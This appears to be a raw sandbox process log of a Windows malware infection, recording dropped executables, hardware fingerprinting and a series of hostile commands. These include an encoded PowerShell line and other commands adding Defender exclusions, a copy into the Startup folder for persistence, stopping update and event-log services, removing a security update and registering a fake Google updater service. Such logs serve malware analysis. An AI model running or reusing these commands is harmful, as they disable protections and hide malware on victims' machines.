"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd2dd146f8,0x7ffd2dd14708,0x7ffd2dd14718
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 560
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 800
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --no-sandbox --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2088 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2168 /prefetch:3
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2384 -ip 2384
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --mojo-platform-channel-handle=2524 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 868
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 928
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 752
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 1120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 1128
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 1196
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4384 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2384 -ip 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 1220
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwATwBwAGQAeABkAHkAZQB1AGwALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwATwBwAGQAeABkAHkAZQB1AGwALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAFkAagBsAHcAdQB1AHkAcwAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABZAGoAbAB3AHUAdQB5AHMALgBlAHgAZQA=
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 560
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 688
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 764
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 836
C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1164
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1048
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1456
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1464
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1132
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\ProgramData\axaso\bkujn.exe
C:\ProgramData\axaso\bkujn.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 7612 -ip 7612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7612 -s 440
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
"Powershell" Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe'
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\ProgramData\axaso\bkujn.exe
"C:\ProgramData\axaso\bkujn.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\2863614952.exe
C:\Users\Admin\AppData\Local\Temp\2863614952.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\sysnldcvmr.exe
C:\Users\Admin\sysnldcvmr.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\ProgramData\axaso\bkujn.exe
C:\ProgramData\axaso\bkujn.exe
C:\Users\Admin\AppData\Local\Temp\1599224382.exe
C:\Users\Admin\AppData\Local\Temp\1599224382.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 9076 -ip 9076
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9076 -s 440
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Users\Admin\AppData\Local\Temp\1549524169.exe
C:\Users\Admin\AppData\Local\Temp\1549524169.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\ProgramData\axaso\bkujn.exe
"C:\ProgramData\axaso\bkujn.exe"
C:\Users\Admin\AppData\Local\Temp\1094014616.exe
C:\Users\Admin\AppData\Local\Temp\1094014616.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\32903688.exe
C:\Users\Admin\AppData\Local\Temp\32903688.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1480
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\ProgramData\axaso\bkujn.exe
C:\ProgramData\axaso\bkujn.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 8092 -ip 8092
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8092 -s 440
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\ProgramData\axaso\bkujn.exe
"C:\ProgramData\axaso\bkujn.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe
"C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1136
C:\Users\Admin\AppData\Local\Temp\Files\server.exe
"C:\Users\Admin\AppData\Local\Temp\Files\server.exe"
C:\Users\Admin\AppData\Local\Temp\Files\injector.exe
"C:\Users\Admin\AppData\Local\Temp\Files\injector.exe"
\??\c:\users\admin\appdata\local\temp\files\injector.exe
c:\users\admin\appdata\local\temp\files\injector.exe
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1216
\??\c:\windows\resources\themes\explorer.exe
c:\windows\resources\themes\explorer.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6884 -ip 6884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 508
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\svchost.exe
c:\windows\resources\svchost.exe
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe PR
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Users\Admin\AppData\Local\Temp\Files\d8rb24m3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\d8rb24m3.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\ProgramData\axaso\bkujn.exe
C:\ProgramData\axaso\bkujn.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\Files\Bluescreen.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Bluescreen.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\ProgramData\axaso\bkujn.exe
"C:\ProgramData\axaso\bkujn.exe"
C:\Users\Admin\AppData\Local\Temp\Files\IadFRw%E2%80%AEfdp..exe
"C:\Users\Admin\AppData\Local\Temp\Files\IadFRw%E2%80%AEfdp..exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6184 -ip 6184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 440
C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe"
C:\Users\Admin\AppData\Local\Temp\Files\shell.exe
"C:\Users\Admin\AppData\Local\Temp\Files\shell.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
